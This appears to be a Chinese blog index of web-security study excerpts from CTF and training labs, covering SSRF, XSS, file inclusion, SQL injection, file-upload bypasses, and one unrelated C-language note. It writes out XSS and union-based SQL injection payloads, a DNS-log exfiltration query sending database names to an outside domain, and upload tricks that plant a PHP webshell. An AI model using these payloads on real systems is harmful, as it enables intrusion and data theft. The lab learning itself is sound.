SSRF、
SSRF一、什么是SSRF?SSRF(service side request forgery)服务器请求伪造,是一种由攻击者形成 服务端发起的安全漏洞,本质上是属于信息泄露漏洞 二、SSRF的攻击方式攻击者借助主机A来发起SSRF攻击,通过主机A像主机B发起请求,从而获取主机B的一些信息。 三、SSRF支持哪些协议?Dict:// file:// sftp:// ldap:// gopher:// ftp:// http://...
zkaq—xss
一、什么是XSSxss漏洞允许攻击者将恶意脚本注入到网页中,当其他用户访问包含这些脚本的页面时,这些脚本将在用户的浏览器中执行 二、XSS注入本质XSS注入攻击的本质,是把用户输入的数据当做js代码执行。 三、XSS注入的关键条件 用户能控制输入 原本的程序要执行的代码,拼接了用户输入的数据 XSS是通过拼接合适的HTML代码去执行恶意的js语句 四、XSS类型 反射型XSS(一次性的) 存储型XSS(没有被删除就一直存在) DOM型XSS:DOM型XSS漏洞是一种特殊类型的XSS,是基于文档对象模型 Document Object Model (DOM)的一种漏洞。 反射型:靶场练习输入 1<script> alert(1) </script> 尖括号被编码 改用事件法 输入 1' onfocus=alert(1) // 存储性:靶场练习在所有可以进行输入的地方都插入弹窗语句,均未弹窗成功 观察到页面使用的是 1FineCMS公益软件 v5.3.0...
zkaq-include
说实话现在的状态真的是难受的一批,想睡又睡不着,闹钟浑浑噩噩的,索性从床上爬起来写一下刚学的题吧 题目文件包含 代码审计全局搜include 代码审计优先级,直接传参大于间接传参 所以跟进 index.php文件下的include $_REQUEST[‘target’]; 进行分析 12345(! empty($_REQUEST['target']) //这里判断传进来的参数是否是空的,若不是返回true && is_string($_REQUEST['target']) //这里判断参数是否是字符串,若是返回true && ! preg_match('/^index/', $_REQUEST['target']) //这里判断参数是否是index开头的,若不是则返回true && ! in_array($_REQUEST['target'],...
C语言笔记
标识符用来标识数据类型,变量,函数,语句的符号 类别 关键字 数据类型关键字 char,double,enum,float,int,long,short,signed,struct,union,unsigned,void 控制语句关键字 break,continue,case,do,default,else,for,goto,if,return,switch,while 存储类型关键字 auto,extern,register,static 其他关键字 const,sizeof,typedef,volatile 数据类型 常量和变量 常量:值一直不变的量 变量:值可以变化的量 变量定义格式 1类型说明符 变量名; eg: 1int variable; //定义一个整形变量 整形变量 short int 短整型 2 int 整型 4 long int 长整型 4 unsigned short 无符号短整型 2 unsigned int 无符号整型 4 unsigned...
CTF-show
WEB板块web签到题查看源码 base64解码 1ctfshow{6d8d8144-c200-4f8e-801c-23b7a1cd2403} web2用户名输入 1' or 1=1 -- a //成功登录 判断字段数 1234' or 1=1 order by 3 -- a //页面正常' or 1=1 order by 4 -- a //页面不正常 判断有3个字段 判断回显位 构造 1'or 1=2 union select 1,2,3 -- a //页面出现2,数字2处为回显位 爆库名 构造 1'or 1=2 union select 1,database(),3 -- a' 爆表名 构造 123'or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 -- a'...
zkaq-数据库注入
MYSQL 注入 - Dns注入前置知识1.dnslog 1用来记录dns被解析的信息 2.dns注入思路 进行注入攻击时,页面无正常回显,使用第三方dnslog平台,通过记录dns解析的信息外带注入数据,将盲注转化成显错注入。 靶场实践判断是否存在注入攻击时遇到waf 使用参数污染进行绕过 构造 1id=2/*&id=1 and sleep(3) -- a*/ //页面延时响应,判断存在注入点 爆库名 构造 1id=2/*&id=1 and (select load_file(concat("\\\\",database(),".zlmwoy.dnslog.cn\\1.txt"))) -- a*/ 爆表名 构造 1234id=2/*&id=1 and (select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema=database()...
zkaq-upload-labs
Pass-01 前端检测文件格式,不允许上传PHP文件 bp抓包,改名 冰蝎连接 Pass-02上传文件,抓包,修改 Content-Type 冰蝎连接 Pass-03不允许上传”.asp”、”.aspx”、”.php”、”.jsp”文件 上传文件抓包 冰蝎,连接 Pass-04线上传一个.htaccess文件 该文件“告诉”后端服务器,将jpg文件当做php文件执行 上传将php一句话木马文件后缀改为jpg 上传 Pass-05大小写绕过 文件改名,后缀用大写。 冰蝎连接 Pass-06文件后缀空格绕过 冰蝎连接 Pass-07文件尾加.绕过 冰蝎连接 Pass-08 冰蝎连接,连接时将 ::$DATA...
zkaq-SQL
post注入post传参类型的注入,与get注入很像。post注入经常出现在登录框且通常是字符型。 靶场演练Pass-051构造' or 1=1 -- a 成功登录,判断的我们的输入的数据有被当做SQL语句执行。 构造 12' or 1=1 order by 3 -- a登录成功' or 1=1 order by 4 -- a登录失败 判断页面有三个字段 暴库名 构造 1'union select 1,2,database() -- a 暴表名 构造 1'union select 1,2,table_name from information_Schema.tables where table_schema=database() limit 0,1 -- a 暴字段 构造 1'union select 1,2,column_name from information_Schema.columns where table_schema=database() and...